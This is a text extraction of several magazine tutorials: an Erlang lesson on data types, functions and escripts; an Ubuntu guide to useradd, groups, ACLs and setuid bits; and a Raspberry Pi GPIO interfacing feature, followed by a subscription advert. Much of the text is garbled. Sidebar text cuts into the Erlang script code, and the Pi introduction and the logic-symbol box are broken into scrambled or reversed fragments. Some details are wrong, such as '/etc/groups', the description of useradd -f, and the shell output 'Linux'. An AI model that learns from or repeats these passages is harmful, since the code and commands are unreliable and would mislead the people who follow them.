Erlang data types as well as other interesting and helpful Erlang topics This tutorial is the second one in the series of tutorials about the Erlang programming language. The main subject of this tutorial is Erlang data types and functions. As you might remember from the tutorial in the previous issue, all Erlang code comes in modules unless you are experimenting in the Erlang shell; as a result, all Erlang code comes in functions. Erlang has a pretty unusual way of defining functions, especially if you are used to programming languages such as C or Python, which will be explained here. Additionally, as Erlang is a functional programming language, it also supports anonymous functions, which are also going to be illustrated. You will also learn about atoms, lists, maps and tuples, so start reading! More About Erlang Tutorial files available: filesilo.co.uk 46 Concurrency is a central part of Erlang. As a result, Erlang processes, which should not be confused with Linux processes, are lightweight. Put simply, Erlang processes are easy to create, much easier than Linux processes, as they require a very small amount of time and have a small memory overhead. Erlang processes do not communicate with each other using memory, which is a risky thing, but by using messages. Furthermore, as processes are independent, the memory space of each process can be garbage-collected individually. Last, the failure of a process cannot do any damage to other processes, therefore allowing them to continue their jobs. More About OTP OTP is a central part of Erlang and the Erlang way of thinking because it allows you to make your Erlang applications highly available. This section will talk a little bit more about OTP in order to get a better understanding of it. OTP is unique among programming languages and allows teams to work and develop distributed, fault-tolerant, scalable and highly available systems. Despite its name (Open Telecom Platform), OTP is domain independent, which means that you can program applications for many different areas. OTP consists of three main parts. These are the Erlang language itself, various tools that come with Erlang, and the design rules, which are generic behaviours and abstract principles that allow you to focus on the logic of the system. The behaviours can be worker processes that do the dirty work, while supervisor processes monitor workers as well as other supervisors. In order to do this right, the developer should structure the processes appropriately. That is enough information about OTP for this tutorial; you will learn even more details about OTP in forthcoming tutorials. Variables and Numbers As expected Erlang supports two kinds of numbers, integers and floats. When defining floats, you should always have a number on the left of the decimal point, even if it is zero. If you forget to do so, you will get the following kind of error message: 11> MyFloat = .987. * 1: syntax error before: ',' If the statement is correct, Erlang will reply by printing the float value: 11> MyFloat = 0.987. 0.987 Figure 1 shows an interaction with the Erlang shell where many variables are declared and used. You should pay special attention to the b() function that prints all defined variables and the f() function that clears all the bound variables when executed without any parameters or a specific variable when the variable is given as an argument. Erlang data types Erlang supports many data types including atoms, maps, lists and funs. An atom is used for representing a constant value. Atoms have a global scope and start with lowercase letters: 1> linux. linux 2> 12. 12 As you can see, the value of an atom is the atom itself! Although it looks strange to discuss the value of an atom or an integer, the functional nature of Erlang requires that each expression has a value, which also applies to atoms and integers, despite the fact that they are naïve expressions. A fun is a functional object that also allows you to create anonymous functions, which you can pass as arguments to other functions as if they were variables, without having to use their names. Figure 2 shows a part of the use Erlang reference about the fun keyword – a forthcoming tutorial will talk more about anonymous functions. A map is a compound data type that can contain a variable number of key-value pairs. Each pair is called an element – the total number of elements is called the size of the map. The following shell command shows how to create a map: 1> MYMAP = #{country=>greece, city=>athens, year=>2016, date=>{nov,18}}. #{city => athens,country => greece,date => {nov,18},year => 2016} As you can understand, there are many functions that allow you to manipulate maps – you can see some of them in action in Figure 3. A list is another compound data type with a variable number of elements. You can define a new list in the Erlang shell as follows: 1> LIST1 = [a, b, 3, {a,b}]. [a,b,3,{a,b}] Please also bear in mind that behind the scenes Erlang treats strings as lists, so everything that can work on a list can also be used for strings. A unique process ID identifies each Erlang process. A PID has the following form and its own data type, which means that you cannot use a process ID as if it was a string: 1> self(). <0.57.0> 47 Tutorial Erlang Right The use of b() and f() functions as well as the declaration of numeric variables in Erlang Figure 1 Figure 2 Across This is a small part of the Erlang reference about the fun keyword Figure 3 The self() function returns the process ID of the calling process. Similarly, the spawn() function returns the process ID of the new process, which is used for sending messages to it: 1> c(hw). {ok,hw} 2> spawn(hw, helloWorld, []). Hello, world! <0.65.0> As you can see, spawn() takes three parameters, which are the name of the module the function belongs to, the name of the function, and the parameters of the function, which are passed as a list. If the function takes no parameters, you should pass an empty list. Figure 3 shows how to define and process maps and lists inside the Erlang shell. As you can see, the first element of a tuple has an index number of 1. Similarly, the setelement() function allows you to change the value of an existing tuple item in order to create a new tuple: Tuples and guards Tuples are handy as they let you group data and are frequently used in Erlang as well as other programming languages. A guard will allow you to specify the kind of data a given function will accept. Although it might just look a little fuzzy at the moment, you will see Erlang code that uses guards later on in this tutorial. The when keyword indicates a guard. The condition of a guard is relatively simple and will allow you to do pattern matching based on the content of the argument and not just on its shape. A tuple is a composite data type, which means that a tuple allows you to combine multiple items into a single data type and store them using a single variable. Most of the times Erlang tuples group two to five items. Moreover, the first atom of a tuple usually identifies the purpose or the category of the tuple. You can declare a tuple as follows: 48 2> T1 = {linux, 1}. {linux,1} The element() function allows you to access a given item of a tuple: 3> element(1, T1). Linux 6> T2 = setelement(1, T1, unix). {unix,1} Erlang functions A function in Erlang is a sequence of function clauses that are separated by semicolons and terminated using a period/full stop (.). A function clause has the following form: 1> F=fun(X) -> 2*X end. #Fun<erl_eval.6.52032458> The previous code creates an anonymous function with one argument. The anonymous function is bound to a variable named F, which is also an atom. You can use it as follows: Figure 4 Figure 5 Across How to define a map and a list in Erlang shell, including functions that help you deal with maps and lists Left The implementation of the process_tuple() function that illustrates how to process tuples 3> F(4). 8 4> F(4.5). 9.0 The number of the arguments of a function is called the arity of the function. It is the combination of the module name (m), the function name (f) and the arity (N) that uniquely identifies a function as m:f/N. As you might remember, you have to export a function in order to be able to use it outside of the module that it belongs to. The next example shows how to pass functions as arguments to other functions! Type the following at the Erlang shell: 1> F=fun(X) -> 2*X end. #Fun<erl_eval.6.52032458> 2> Five = fun(N, Function) -> 5 * Function(N) end. #Fun<erl_eval.12.52032458> 3> Five(10,F). 100 4> F(10). 20 Here, you define two anonymous functions, named F() and Five(). The Five() function takes two arguments, which is an integer ‘N’ and a function ‘Function’ and multiplies the numeric result of Function(N) with the number 5! More about functions Erlang supports much more complex functions than the ones you saw in the previous section. The following example will illustrate how to use a function to process a tuple. Please have in mind each tuple counts as a single function argument. A very common way to process tuples is by using pattern matching. Figure 4 shows the code of the process_tuple() function that processes tuples as found in tuples.erl. Executing tuples:main/0 generates the next output: 15> c(tuples). {ok,tuples} 16> tuples:main(). Size: 6 First element: [1,2] Size: 4 First element: a Ok The last example will show a function that processes tuples using guards and a case statement, which is a pretty common practice in Erlang. Figure 5 shows the relevant Erlang code as found in more_fun.erl. Using more_fun:check_temp/1 generates the following kind of output: 11> c(more_fun). more_fun.erl:12: Warning: variable 'N' is unused more_fun.erl:14: Warning: variable 'N' is unused {ok,more_fun} 12> more_fun:check_temp({fahrenheit, 50}). 'Do not know about Fahrenheit!' 13> more_fun:check_temp({kelvin, 50}). 'Cannot tell about Kelvin!' 14> more_fun:check_temp({celsius, 50}). 'Way too hot!' 15> more_fun:check_temp({celsius, 10}). 'It is getting cold...' As you can see, not all case statements must have a guard. More information about the Erlang shell The q() function is the easiest way to exit the Erlang shell, but keep in mind that the q() function quits everything Erlang is doing. If you are working locally then there is no problem, but if you are working on a remote system you’d better quit by typing Ctrl+G and then Q. The reason is that you may shut down the Erlang runtime on the remote machine when quitting using q()! The built-in line editor of erl is a subset of Emacs. In Figure 6 you will see some more advanced commands of the Erlang shell including the declaration of a function, the use of the h() function to print the history list, and two alternative ways to exit the Erlang shell, the init:stop() function as well as the halt() function. Getting user input Although Erlang is primarily used for server applications, it can also allow you to interact with users. This section will teach you how to get user input from Erlang, which is pretty handy when you are developing small interactive programs or other command line utilities. Although it is relatively easy to get user input from the Erlang shell, the tricky part is verifying that the input is valid in order to avoid exceptions: 49 Tutorial Erlang Right How to define a function inside the Erlang shell and the init:stop() and halt() functions that help you exit it Figure 6 Figure 7 Across The code of userInput.erl illustrates one way of getting user input As you will see, Erlang is not particularly good at dealing with strings. Additionally, it is the job of the developer to check that the input is in the right form and of the desired data type because improper data might create troubles when you attempt to process it. There are other ways to get user input, including reading characters and reading entire lines of text – you will learn more about it in the Erlang tutorial in the next issue. 1> {ok, [VAR]} = io:fread("input : ", "~d"). input : 123 {ok,"{"} 2> VAR. 123 3> {ok, [OTHER]} = io:fread("input : ", "~d"). input : abc ** exception error: no match of right hand side value {error,{fread,integer}} Figure 7 shows sample Erlang code that teaches you how to get user input and make sure that you take what you want, which you might find more complicated than expected, especially if you are familiar with other programming languages. Executing userInput.erl generates the following kind of output: 1> c(userInput). {ok,userInput} Please give {Name, Surname} >> There is an error somewhere. Please give {Name, Surname} >> 'Tsoukalos'}. Hello 'Mihalis' 'Tsoukalos'! Please give {Name, Surname} >> A tuple is needed! Please give {Name, Surname} >> Bye! ok asd, asd. {'Mihalis', 12. quit. As you can imagine, the key role is played by the function that checks the return value of the io:read() function, which is a tuple. Additionally, the user needs to end each input with a dot. 50 Creating Erlang scripts The escript binary file allows you to create Erlang scripts, which is an attractive capability of Erlang found in most scripting languages. The following Erlang script accepts one command line argument and asks the user for their name, using a simplified version of the code found in userInput.erl: #!/usr/bin/env escript %% -*- erlang -*main([String]) -> try N = list_to_integer(String), I = io:read("Please give {Name} >> "), Filesystems and the Erlang shell There will be times when you would like to move to another directory while you are working in the Erlang shell. Look at the following interaction with the Erlang shell: 1> pwd(). /home/mtsouk OK 2> cd(".."). /home OK 3> pwd(). /home OK So, the cd() function allows you to change the current directory, whereas pwd() prints the current working directory. process_input(I), io:format(": ~w ~n", [N]) Figure 8 catch _:_ -> usage() end; main(_) -> usage(). Left The use of the fibo() function found in fibo1.erl usage() -> io:format("usage: scriptName integer\n"), halt(1). process_input({ok, Data}) when is_tuple(Data) -> Name = element(1, Data), io:format("~w", [Name]); process_input({error, _}) -> io:format("There is an error somewhere.~n"). After creating the script file, you should change its permissions: $ chmod 755 aFile.erl $ ls -l aFile.erl -rwxr-xr-x 1 mtsouk staff 0 Nov 14 15:30 aFile.erl Next, you can execute aFile.erl as if it was a regular shell script: $ ./aFile.erl 123 Please give {Name} >> {'Mihalis'}. 'Mihalis': 123 Calculating Fibonacci numbers We will now learn how to calculate Fibonacci numbers in a different way than the one you saw in the previous issue of Linux User and Developer. The code of the fibo() function, which can be found in fibo1.erl, is the following: fibo(N) when N > 0 -> fibVar(N, 0, 1). fibVar(0, F1, _F2) -> F1; fibVar(N, F1, F2) -> fibVar(N - 1, F2, F1 + F2). You can see its performance using the time(1) command in Figure 8. The implementation of fibo() in fibo1.erl uses another function that is named fiboVar() and takes three arguments instead of just one. However, as fiboVar() is only used internally, it does not need to be in the export() list of the module. The only function in the export() list is main/1. Figure 9 As you can see, you just have to embed your Erlang code into a text file in a specific way and read the command line arguments as a list using the list_to_integer() function. This is a very pretty way of creating small Erlang programs that do specific but relatively small tasks. The next tutorial will talk about many interesting things including formatting output, lists, maps, records and message passing between Erlang processes. Until then, write as much Erlang code as you can! Left The use of the fibo() function found in fibo2.erl as well as its entire Erlang code Infinite loops The following Erlang code, when combined with a negative integer as an argument, generates a function that keeps running and never ends: fibo(0) -> 0; fibo(1) -> 1; fibo(N) -> fibo(N - 1) + fibo(N - 2). In other words, you should be very careful when defining the arguments that a function can accept, and put guards where necessary in order to avoid such bugs. A more appropriate and secure definition of fibo() would be the following: fibo(N) when N > 0 -> fibVar(N). fibVar (0) -> 0; fibVar (1) -> 1; fibVar (N) -> fibVar (N - 1) + fibVar (N - 2). More about Fibonacci numbers Although the Erlang code of fibo1.erl is different from the code you saw in the previous issue, there is another way to calculate Fibonacci numbers in Erlang, which is presented in fibo2.erl. The implementation of the fibo() function, which uses a list, as well as its performance, can be seen in Figure 9. Just remember to compile the code first using erlc, which is the Erlang compiler. As you can see, not all Fibonacci implementations are equal! 51 Tutorial User accounts Manage user accounts in Ubuntu Learn how to effectively manage user accounts, permissions, groups and more Swayam Prakasha has a master’s degree in computer engineering. He has been working in information technology for several years, concentrating on areas such as operating systems, networking, network security, electronic commerce, internet services, LDAP and web servers. Swayam has authored a number of articles for trade publications, and he presents his own papers at industry conferences. He can be reached at swayam.prakasha@ gmail.com Resources Unix / Linux Administration The Beginner’s Guide to Managing Users and Groups on Linux Managing Linux User Account Security Managing Ubuntu Linux Users and Groups Figure 1 Details of the useradd command 52 As you might expect, adding and managing users is the most common task of any Linux system administrator. User accounts help in keeping boundaries between the people who use the system and the processes that run on the system. Groups are a means of assigning rights to your system. As expected, each user needs to have a separate user account. Having a user account provides an area in which you can securely store files. One way to add user accounts is through the User Manager windows. The other, very straightforward method for creating a new user from the shell is to use the useradd command. After opening a Terminal window, you just need to invoke useradd at the command prompt. But, please note that for this, you need to have root permissions. The useradd command has one required field – the login name of the user – but you can also include some additional information using various options. The following table describes some of the popularly used options with the useradd command. Option -c “comments” -d home_dir -e expiry_date -p passwd -f -1 -s shell Description Provide a description of the user account Set the home directory to use for the specific account Assign the expiration date for the user account Enter a password for the account that you are adding Set the number of days after which password expires Specify the command shell to use for this account Please note here that we have started with sudo as useradd needs root privileges. We are trying to create an account for a new user, in this case, the author. Once the user is created, the next step is to set up the initial password. This can be done using the passwd command as shown below (the example includes the author’s username; this would be replaced by the username of the user you will be adding). ~$ sudo passwd swayam A successful execution of the above command prompts the user to type the password twice. The useradd command determines the default values for new accounts by reading the /etc/login.defs and /etc/default/ useradd files. You can modify these default values by editing the files manually with any text editor. It needs be noted here that login.defs is different on different Linux systems. Some of the parameters that can be configured in /etc/login.defs file are given here. PASS_MAX_DAYS PASS_MIN_DAYS PASS_MIN_LEN PASS_WARN_AGE Please note that all uncommented lines in /etc/login.defs file contain a keyword / value pair. As an example, the keyword PASS_MIN_LEN is followed by some white space and the value 5. This tells the useradd command that the user password must be at least five characters. You can refer to the /etc/default/ useradd file in order to view the other default settings. You can also see the default settings by using the command useradd with the –D option. Let’s look at the useradd command with an example. ~$ sudo useradd -c “Swayam Prakasha” swayam You can also use the –D option to change the default settings. In order to do this, give the –D option first and then add the defaults you want to set. For example, to set the default home directory location to /home/swayam, for example, you can use the following command. ~$ useradd -D -b /home/swayam In addition to setting up user defaults, an administrator can also create default files that are copied to each user’s home directory for use. These files typically include login scripts and the shell configuration files. Let’s take a look at another useful command – usermod – that can be used to modify the settings for an existing account. This command provides a straightforward method for changing the account parameters. Many of the options available with Above A look at the default settings the usermod command mirror those found in the useradd command. The popular options that you can use with usermod command are: • -c username - Change the description associated with the user account. • -d home_dir - Change the home directory to use for a specific account. • -e expire_date - Assign a new expiration date for the account. • -l login_name - Change the login name of the user account. • -s shell - Specify a different command shell to use for this account. Now let’s take a quick look at some of the examples for the usermod command. ~$ usermod -s /bin/csh [username] This changes the shell to csh for the named user. ~$ usermod -Ga accounting [username] -Ga makes sure that the supplementary groups are added to any existing groups for the specific user. Another command that will come in very handy in user accounts management is userdel. This command can be used to remove users. ~$ userdel -r [username] from the /etc/password file. Since we have used the –r option, it removes the user’s home directory as well. We need to keep in mind here that simply removing the user account does not change anything about the files that the user leaves around the system (except in cases where we use the –r option). Now it is time to understand more about group accounts on Ubuntu systems. The concept of group accounts will come into the picture if we need to share a set of files with multiple users. You can create a group and change the set of files to be associated with that group. Please note that the root user can assign users to a group so that they can have access to files based on the group’s permissions. Every user is assigned to a primary group. By default, that group is a new group with the same name as the user. You can easily identify the primary group by the number in the third field of each entry in the /etc/ passwd file. Linux typically stores the list of all users in a file called /etc/ groups. You can run a command in the Terminal to view as well as to edit the users and groups in the system ~$ sudo vigr /etc/groups Let’s look at how to create group accounts. As a root user, you will be able to create new groups by using the command groupadd at the command line. Also, note that groups are created automatically when a user account is created. Let’s take a look at a couple of examples: ~$ groupadd mars Here, a group named Mars is created with the next available group ID. When the above command is executed, the user is first removed User accounts help in keeping boundaries between the people who use the system and the processes that run on it ~$ groupadd -g 14235 venus A group named Venus is created with a group ID of 14235. Disable root login When you have your own account set up, it is good practice for you to go and disable SSH remote login for root. This can be done by modifying the contents of a configuration file /etc/ssh/sshd_ config. Look specifically for PermitRootLogin and set it to no. 53 Tutorial User accounts If you are interested in changing a group at a later point in time, you can use the groupmod command. ~$ groupmod -g 300 mars The group ID of Mars is changed to 300. ~$ groupmod -n stars venus The name Venus is changed to Stars. Let’s turn our attention to Access Control Lists (ACLs). With the help of ACLs, one user can allow others to read, write and execute files and directories without requiring the root user to change the user or group that's assigned to them. There are a few important things to know about ACLs: • ACLs need to be enabled on a file system when that file system is mounted • To add ACLs to a file, you use the setfacl command • To view ACLs set on a file, use the getfacl command • To set the ACLs on any file or a directory, you need to be the actual owner assigned to it Let’s take a detailed look at the setfacl command. The system administrator can use this command to modify the permissions (by using the –m option) or to remove the ACL permissions (by using the –x option). Below A look at users and groups ~$ setfacl -m u:[username]: rwx file_name In this command, first we used the modify (–m) option followed by the letter u – this indicates that we are setting the ACL permission for a specific user. Then we have specified the username after the colon. After another colon, we have the permissions that we want to assign. We can assign read (r), write (w) and / or execute (x) permissions to the user or the group. Another important aspect that we need to understand with reference to ACL is related to the set-up of default ACLs. Setting up default ACLs on a directory enables your ACLs to be inherited. In other words, when we create new files and directories in that directory, they are assigned the same ACLs. In order to set a user or group ACL permission as default, you just need to add ‘d:’ to the user or group designation. You can make sure that the default ACL will work by creating a subdirectory and running the getfacl command. After that, you will see that the default lines are added for the user, group and so on, which are actually inherited from the directory’s ACL. Next, let’s look at how we can enable ACLs. Basic Linux file systems that we create after installation have only one user and group assigned to each file and directory and thus, they do not include ACL support by default. In order to add ACL support, we need to add the acl mount option when we mount it. This can be done in multiple ways. You can add the acl option to the fourth field in the line in the /etc/fstab file that automatically mounts the file system when the system boots up, or you can add the acl option to the mount command line when you mount the file system manually by using the mount command. /dev/sdc1 ext4 acl /var/extra_stuff 1 2 Here, we are trying to mount the ext4 file system located on the /dev/sdc1 device to the /var/extra_stuff directory. Note that instead of the default entry in the fourth field, we have added acl. If there were already other options set in that field, we need to add a comma after the last option and then add acl. With this acl field, the next time the file system is mounted, ACLs are enabled. For the second option, add ACL support by mounting the file system by hand and using the acl option with mount. This can be done using a command similar to this: :~$ mount -o acl /dev/sdc1 /var/extra_stuff It is important to note here that the mount command only mounts a file system temporarily. When the system boots, the file system is not mounted again. Thus it is necessary to have an entry in the /etc/fstab file. Let’s take a look at how to add directories for users so that they can collaborate among themselves. When we talk about permissions, we know that there are read, write and execute bits for users, groups and others. In addition to these bits, there are special file permission bits that can be set by using the chmod command. The bits that you need to use for creating collaborative directories are the set group ID bit and the sticky bit. There are specific numeric values associated with these bits: 54 Name Set user ID bit Set group ID bit Sticky bit Numeric value 4 2 1 You can use the set group ID bit for creating the group’s collaborative directories. The set UID (user ID) and set GID (group ID) bits are typically used on special executable files that allow commands to be run differently. In a normal situation, command that determines the permissions the command has to access the resources on the machines. For example, a set UID command owned by root will run with root commands. The default way of authenticating users is to check the user information against the contents of the /etc/passwd file and the passwords from the /etc/shadow file. But there are other methods. It’s common practice in large enterprises to store the user account information in a centralised authentication server. The advantage with this set up is that when we install a new Linux system, we do Above Details of the setfacl command We can have the Linux system query the authentication server when someone tries to log in when a user runs a command, that command runs with that user’s permissions. For example, if we run the cat command as the user Jo, that instance of the cat command would have the permissions to read and write files that the user Jo could read and write. Commands with the set UID or set GID bits set are different. It is the owner and the group assigned to the Implement password policies Whenever we have more remote users, it is always important to implement and enforce reasonable password policies. This can be done by using the Linux PAM module, called pam_cracklib.so. With this module, you can prevent weak password usage. not need to add user accounts to that system. Instead, we can have the Linux system query the authentication server when someone tries to log in. For authenticating users with a centralised auth server, we need to provide the account information including username, user/group IDs, default shell etc, and the authentication method. A restricted deletion directory is created by turning on a directory’s sticky bit. In a normal situation, if write permission is open to a user on a file or a directory, then that user can delete that file or the directory. But when it comes to a restricted deletion directory, unless you are the root user or the owner of the directory, you will not be able to delete another user’s files. 55 Special offer for readers in North America 7 issues FREE FREE When you subscribe resource downloads in every issue The open source authority for professionals and developers Order hotline +44 (0)1795 418661 Online at *Terms and conditions This is a US subscription offer. You will actually be charged ÂŁ80 sterling for an annual subscription. This is equivalent to $105 at the time of writing, exchange rate may vary. 7 free issues refers to the USA newsstand price of $16.99 for 13 issues being $220.87, compared with $105 for a subscription. Your subscription starts from the next available issue and will run for 13 issues. This offer expires 30th April 2017. Quote USA for this exclusive offer! THE ESSENTIAL GUIDE FOR CODERS & MAKERS PRACTICAL Raspberry Pi 58 “Go beyond using off-the-shelf interfaces like HATs, or even building circuits that others have designed, by designing your own electronic circuits” Contents 68 Raspberry Pi air drum kit 70 Make an egg-drop game with the Sense HAT 76 Make a Pi-based warrant canary 78 A Raspberry Pi photo frame 57 Feature Secrets of Pi interfacing of tronic c le e le p im s n desig Learn how to rface your Raspberry e circuit s to int al-world devices Pi to re Pi to ch as a Raspberry oard computer su ills. sk t en fer dif Using a single-b requires two quite es vic de d orl you , l-w nd control rea t code, and seco be able to churn ou to ed ne . u es yo vic st, Fir external de interface the Pi to in need to be able to those areas and, of nd co se the at k elf loo sh ewe -th Here yond using off ate how to go be have particular, investig circuits that others ing ild bu Ts, or even . Using its cu cir interfaces like HA ic on ctr ning your own ele hes, designed, by desig le to connect switc , you’ll soon be ab ide gu ms, gra dia it cu cir this hands-on t Here we’ll presen re. mo ch ide mu gu so r d LEDs an m, see our earlie familiar with the t no na e tur u’r to yo w if ho t bu explained veloper 169), which (Linux User & De o a working circuit. but circuit diagram int the Raspberry Pi, is is interfacing to ch su rs ute mp Our main emphas co er small o be applied to oth cations. pli ap ol most of this can als ntr co for ich are also popular as the Arduino, wh UNDERSTAND THE PI’S GPIO HARDWARE Discover the Pi’s GPIO hardware – its gateway to the real world Even allows you to obtain power from the Pi for your external interface circuitry so you don’t need a separate power supply. GPIO pin numb ering There are two numb ering schemes for GPIO pins. First there’s the physical numb ering. This reflects each pin’s position on the header, so it runs from 1 and 2 at on e end to 39 and 40 at the oth er. Then, for the ac tual GPIO pins (as oppo sed to power supp lies), there are GPIO nu mbers. You can ch oose to use either schem e in the software. MAXIMUM RATINGS The Raspberry Pi’s GPIO operates from a supply of 3.3V, so you shouldn’t present a higher voltage to any of the pins. Doing so will probably destroy the Pi. However, there are ways of interfacing to devices that require higher voltages, as we’ll see later in the ‘Exceed limits safely’ section (on page 66).. Again, this is covered in the ‘Exceed limits safely’ section. GPIO PINS With two exceptions, the remainder of the pins on the GPIO header are GPIO pins although some also have secondary functions that we’re not going to get embroiled in here. As the phrase ‘general-purpose. 59 Feature Secrets of Pi interfacing HOW TO CONNECT A SWITCH AND AN LED TO THE PI Interfacing a switch or an LED to the GPIO header really couldn’t be simpler 01 Wire in the switch The first job in interfacing a switch to the Pi is to connect one of the switch’s two terminals to a GPIO pin (which will be configured as an input in the software) and connect the other of its terminals to 0V (GND). Having done this, the GPIO pin will be connected to 0V, a condition that the software will see as a logic 0, whenever the switch is closed, ie held down in the case of a push button or in its ‘on’ state with a mechanically latching toggle switch. 02 Add a pull-up resistor 03 Use built-in pull-ups Although a GPIO pin wired to a switch and 0V will be at logic 0 when the switch is closed, it will be ‘floating’ when it’s open. In other words, it wouldn’t be certain whether it would be seen as a 0 or a 1. To overcome this, it must be wired to +3.3V via a resistor, which is referred to as a pull-up resistor. Now, the GPIO pin will be logic 1 when the switch is open. The resistor value isn’t critical, but 10k is a good choice. If you’re wiring the switch to some types of other single-board computer or to the Pi’s GPIO via some logic circuitry, an external pull-up resistor is the only solution. However, if you’re interfacing directly to a GPIO pin, you can, as an option, enable an internal pull-up resistor in the Pi’s circuitry. The bit of code reproduced here shows how this is done using the RPi.GPIO Python library. The circuit diagrams in the remaining steps assume an external pull-up, but, if you’re using an internal pull-up, just omit the 10k resistor. 60 GPIO.setup (2, GPIO.IN, pull_up_down=GPIO.PUD_UP) # set GPIO 2 as input with pull-up 04 Limit the current 05 De-bounce the switch Because GPIO pins are bidirectional, there’s a potential problem if a pin that’s attached to a switch is accidentally configured as an output and set to a logic 1. This will put 3.3V on the pin which, if the switch is then closed, would be connected directly to 0V. This would cause a high current to flow and, potentially, damage the Pi. Putting a resistor in series with the switch will prevent this, and 1k is the recommended value. The series resistor is also integral to the circuit in the next step, so don’t omit it if you want to add de-bounce circuitry. When a switch is operated, the contacts often open and close several times very quickly for a short time. This is called bounce, and it might cause problems. Perhaps pressing a push button is supposed to turn a LED on or off. Now, if the LED is off and you press and release the push button but it switches closed-open-closed-open instead of closed-open, the LED will switch on and off again very quickly, but it would appear that nothing has happened. This is remedied by adding a capacitor as shown – a value of 100n is typical if you’re using a 1k current-limiting resistor. Alternatively, software de-bounce can be selected in the RPi.GPIO library. Resistor and capacit or values Often, the values of res istors and capacitors are not critical, and typical used. However, when inte values can be rfacing an LED, you mu st work out the value of resistor. Often you’ll find the current-limiting that you can’t buy a res istor of the value you’ve resistors (and capacitors) calculated because only come in certain pre ferred values. In the common E-12 ser ies, these values are 1.0, 1.2, 1.5, 1.8, 2.2, 2.7, 3.3, and 8.2. However, you may 3.9, 4.7, 5.6, 6.8 come across additional values from other series. can be multiplied by pow These values ers of ten. So, in the cas e of resistors, in addition you’ll find 47, 470, 4.7k, to 4.7, for example, 47k, 470k and 4.7M. If a resistor isn’t availab le in a value you calculat ed, the general rule is to case of an LED current-lim play it safe. In the iting resistor, this means picking the closest larg er value. and possibly damaging the Pi. This is prevented by adding a series resistor which drops the excess voltage. The resistor must drop the difference between 3.3V and the LED’s forward voltage. The value is worked out using Ohm’s law, as described in the next step. 06 Use multi-way switches 07 Understand LED basics 08 Limit the current A multi-way rotary switch is handled in just the same way as a single-way switch except that it connects to several GPIO pins and requires the interface circuitry described earlier for each of those pins. The circuit diagram shows how this would be done for a four-way switch. De-bounce capacitors aren’t included because bounce isn’t as much a problem with a multi-way or toggle switch as it is with a push button, because of their mechanically latching nature. 09 Use Ohm’s law First you need to decide the drive current for the LED. This must be less than the LED’s recommended current and less than the GPIO pin’s maximum of 16mA. Also, the total current drawn from all GPIO pins must be less than 50mA. 10mA will often give enough light, even if the recommended current is greater. Ohm’s law is summarised as V = I R. This can be rearranged as R = V / I to give the value of the resistor, R, where V is the voltage that needs to be dropped (ie 3.3V minus the LED’s forward voltage), and I is the drive current. For example, a forward voltage of 2.0V and a current of 10mA (0.01A) will require a value of (3.3 – 2.0) / 0.01 = 130 ohms. An LED (light-emitting diode) is a component that produces light when a current flows through it. It’s a polarised device, so its anode must always be connected to the positive supply and its cathode to the negative supply. A fundamental property of an LED is its forward voltage, which is usually between 1.8V and 3.3V depending on its colour and type. An LED requires this voltage in order to illuminate. Also important is the recommended current, at which its brightness and so on will be quoted. All these parameters are shown in the LED’s specification sheet. Turning on a LED from a GPIO pin involves configuring the pin as an output and then outputting a logic 1. This puts 3.3V on the pin, but this will probably exceed the LED’s forward voltage, thereby causing its maximum current to be exceeded, destroying the LED 10 White and blue LEDs Some LEDs – mainly blue, white and ‘pure green’ – have forward voltages higher than 3.3V, so they can’t be driven directly from a GPIO pin. Even if the value is specified as 3.3V, driving it directly from a GPIO pin would not be safe or reliable. The solution is to drive it from a higher voltage, as discussed later in the ‘Exceed limits safely’ section (page 66). 61 Feature Secrets of Pi interfacing LOGIC CIRCUITRY EXPLAINED Understand logic circuitry to add extra functionality to your interface Since the processor in the Raspberry Pi can carry out any imaginable logic operation, it might be reasonable to assume that there’s no benefit to be gained from using external logic circuitry. While this would be true if the Pi has sufficient GPIO pins for your application, if you’re getting close to the limit then by using external hardware logic, you can reduce the number of pins needed. Our step-by-step guide provides some examples of how to do this; here we provide an introduction to logic circuitry. LOGIC LEVELS Logic components operate on two voltages that represent the binary values of 0 and 1 although, for some applications, it might be more appropriate to think of them as off and on respectively. In the case of the Pi’s GPIO pins, 0 is represented by 0V (GND) while 1 is represented by 3.3V. With other singleboard computers that use a 5V supply, 0 is still represented by 0V, but 1 is represented by 5V. You should choose a family of logic chips (see ‘IC logic families’) to match the supply voltage of your computer. INVERTER The simplest logic component is the inverter, which has one input and one output – see the diagrams for symbols of all logic gates. As the name suggests, its function is to invert the value on its input; so, if the input is 0 then the output will be 1 and if the input is 1 then the output will be 0. The operation of a logic component is often defined by a truth table and, while it’s barely necessary in this simple case, the truth table for an inverter appears here: Input 0 1 Output 1 0 Understandin g logic symbo ls 62 The diagram sh ows the standa rd symbols for various logic ga the tes. Each of th ese has one or inputs at the lef more t and a single ou tput at the right notice that som . You’ll e symbols have little circles on outputs. Thes their e are gates that have inverted So, for example outputs. , the symbol fo r a NA means Not AN ND gate (which D) is the same as that for an AN D gate except for its inv erted output. Most other log ic devices, for example a 2-to decoder, are jus -4 t shown as squa re or rectangu boxes, again us lar ually with the inp uts on the left the outputs on and the right. Beca use so many dif devices would ferent otherwise look the same when as boxes, thes shown e symbols are usually annota their part num ted with ber (eg 74HC13 8) and the vario and outputs ar us inputs e labelled with their function usually their pin and numbers. Logic devices connec 0V and a powe t to r supply and wh ile th es usually appear e connections on more compli cated logic devic they aren’t norm es, ally shown on ga tes. AND AND OR GATES Next up after the inverter is a group of logic components referred to as gates. Gates can have any number of inputs (although two is the most common), and one output. To set the ball rolling we’ll look at the 2-input AND gate, the function of which can be summed up as follows. If input 1 is 1 AND input 2 is 1 then the output is 1; all other combinations of the inputs result in an output of 0. Using a similar statement, we can sum up the function of the OR gate as follows. If input 1 is 1 OR input 2 is 1 then the output is 1; all other combinations of input (actually there is only one other combination) result in an output of 0. Truth tables for the 2-input AND gate and the 2-input OR gate appear here. Input 1 0 Input 2 0 Output 0 0 1 1 1 0 1 0 0 1 Input 1 0 Input 2 0 Output 0 0 1 1 1 1 0 1 1 1 NAND, NOR AND XOR GATES The phrases NAND gate and NOR gate might sound odd at first. However, if we point out that NAND means Not AND, and that NOR means Not OR, then the pieces start to fall into place. A NAND gate is effectively an AND gate with an inverter connected to its output and its truth table is that same as that for the AND gate but with the 0s in the output column changed to 1s and vice versa. Similarly, a NOR gate is an OR gate with an inverter connected to its output, so its truth table is the same as that for the OR gate, again with the 0s and 1s swapped in the output column. The one remaining type of gate is the XOR gate, which stands for eXclusive OR gate, and the truth table of which appears here. Input 1 0 Input 2 0 Output 0 0 1 1 1 1 0 1 1 0 You’ll notice that it’s the same as the truth table for the OR gate, but differs in that the output is 0 when both inputs are 1. Another way of looking at its function is that its output is 1 